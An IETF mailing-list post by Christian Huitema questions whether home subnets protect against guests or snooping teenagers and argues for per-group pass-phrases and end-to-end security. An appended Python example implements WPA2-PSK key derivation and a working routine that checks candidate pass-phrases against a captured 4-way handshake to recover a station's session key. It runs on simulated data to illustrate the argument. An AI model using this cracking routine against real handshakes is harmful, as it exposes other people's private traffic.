> Assume we agree on the needed functionality. It is hard to
> disagree and many of us have seen the need to isolate some
> people and apparatus from others, and to assign different
> capability to them, for many years.

People want security, and the threats that Michael mentions are real: children spying on the parents' traffic, guests abusing the access to do something illegal on the Internet. But subnets are not a particularly efficient way of solving these threats.

Take the issue of guests abusing the privilege and engaging in illegal action. The concrete risk is that men in black will knock at your door and ask about said actions. Picture yourself arguing that "it obviously wasn't me, because the packets come from the network that I provide to my guests". The men in black will not be impressed, since you obviously have access to all the networks in your house. Your only defense will be to rat out a specific guest, supposing of course that you are so inclined. Subnet or no subnet will not help you do that. Access control and logs will help, but these are not tied to subnets.

Consider then the attacks between computers on the same network. Michael mentioned traffic snooping. But modern Wi-Fi networks are protected against that already. They negotiate different per-session keys. Even in promiscuous mode, the Wi-Fi card does not see the unicast traffic of the other stations in the network. In home networks, the key is derived from an initial 4-way handshake, secured by a pass-phrase. Most deployments use a single pass-phrase today, so teenagers could indeed develop tools to crack the exchange. But nothing prevents using different pass-phrases for different groups of users.

The other risks are the active attacks between connected computers. However, as John pointed out, there is a lot of demand for connectivity between computers in the home. Many people have tried to engineer network topologies that follow organization or authorization boundaries, but mostly that makes your network expensive to run without really solving the issues. Also, ultimately, all forms of topology-based control rely on the security of the home router. Do you really believe that a teenager who is clever enough to hack into Wi-Fi access protections will not also be able to hack into the home router?

If we want actual protection, it is probably much easier to use end-to-end security. And in your own house, you might consider forms of social control, as in "OK, you hacked my computer, give me the keys of your car..."

Frankly, I don't see users managing subnets any time soon.

-- Christian Huitema

_______________________________________________
Ietf@xxxxxxxx
https://www1.ietf.org/mailman/listinfo/ietf
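The point about per-session Wi-Fi keys, a shared pass-phrase and per-group pass-phrases can be made concrete. The following is an added example written for this page; it is not code from Christian Huitema or from the IETF thread. It implements the WPA2-PSK derivation chain as specified in IEEE 802.11 (PBKDF2-HMAC-SHA1 of the pass-phrase and SSID into the PMK, the "Pairwise key expansion" PRF into the PTK, and the HMAC-SHA1 EAPOL-Key MIC), then shows that a station which knows the household pass-phrase and captures another station's 4-way handshake can recover that station's session key by checking candidate pass-phrases against the MIC, while a guest holding a different pass-phrase cannot. The SSID, MAC addresses, nonces, EAPOL-Key bytes and word list are all constructed for the example, not captured from a real network.

```python
"""WPA2-PSK key derivation and the handshake-cracking check it allows.

Added example, not the post's own code. All addresses, nonces, the SSID and
the EAPOL-Key frame bytes below are constructed for illustration.
"""
import hashlib
import hmac
import os

SSID = "HomeNet"  # constructed SSID


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """IEEE 802.11 PRF-n: concatenate HMAC-SHA1(key, label || 0x00 || data || i)."""
    out = b""
    i = 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK (384 bits for CCMP: KCK | KEK | TK) from the PMK, both MACs and both nonces.

    The per-session part is the two nonces; the pass-phrase part is the PMK.
    """
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 48)


def eapol_mic(kck: bytes, eapol_frame_mic_zeroed: bytes) -> bytes:
    """EAPOL-Key MIC for key descriptor version 2: HMAC-SHA1(KCK, frame)[:16]."""
    return hmac.new(kck, eapol_frame_mic_zeroed, hashlib.sha1).digest()[:16]


def simulated_capture(passphrase: str, ssid: str) -> dict:
    """What a sniffer sees of one station's 4-way handshake (constructed values).

    Message 2 of the handshake carries the supplicant's MIC; the attacker sees
    both MACs, both nonces, the frame bytes and the MIC, but not the PMK/PTK.
    """
    aa = bytes.fromhex("001122334455")      # constructed AP address
    spa = bytes.fromhex("66778899aabb")     # constructed station address
    anonce, snonce = os.urandom(32), os.urandom(32)
    eapol = b"\x01\x03\x00\x75\x02\x01\x0a" + b"\x00" * 16 + b"constructed EAPOL-Key body"
    ptk = derive_ptk(derive_pmk(passphrase, ssid), aa, spa, anonce, snonce)
    return {"aa": aa, "spa": spa, "anonce": anonce, "snonce": snonce,
            "eapol": eapol, "mic": eapol_mic(ptk[:16], eapol)}


def crack_handshake(capture: dict, ssid: str, wordlist):
    """Return (passphrase, PTK) for the first candidate whose MIC verifies, else (None, None).

    With the right pass-phrase the attacker now holds the victim's temporal key
    (ptk[32:48]) and can decrypt that station's unicast traffic.
    """
    for cand in wordlist:
        pmk = derive_pmk(cand, ssid)
        ptk = derive_ptk(pmk, capture["aa"], capture["spa"], capture["anonce"], capture["snonce"])
        if hmac.compare_digest(eapol_mic(ptk[:16], capture["eapol"]), capture["mic"]):
            return cand, ptk
    return None, None


if __name__ == "__main__":
    family = simulated_capture("family-only-phrase", SSID)
    # A household member (or anyone who learned the shared pass-phrase) succeeds.
    print(crack_handshake(family, SSID, ["123456", "family-only-phrase"])[0])
    # A guest who was given a different pass-phrase for a guest group does not.
    print(crack_handshake(family, SSID, ["guest-phrase"])[0])
```

The "word list" here is just the pass-phrase the attacker already knows; a real attack tries a dictionary, which is why the strength of a single shared pass-phrase bounds the protection of every station on the network, and why handing guests a separate pass-phrase keeps their knowledge from unlocking the family's sessions.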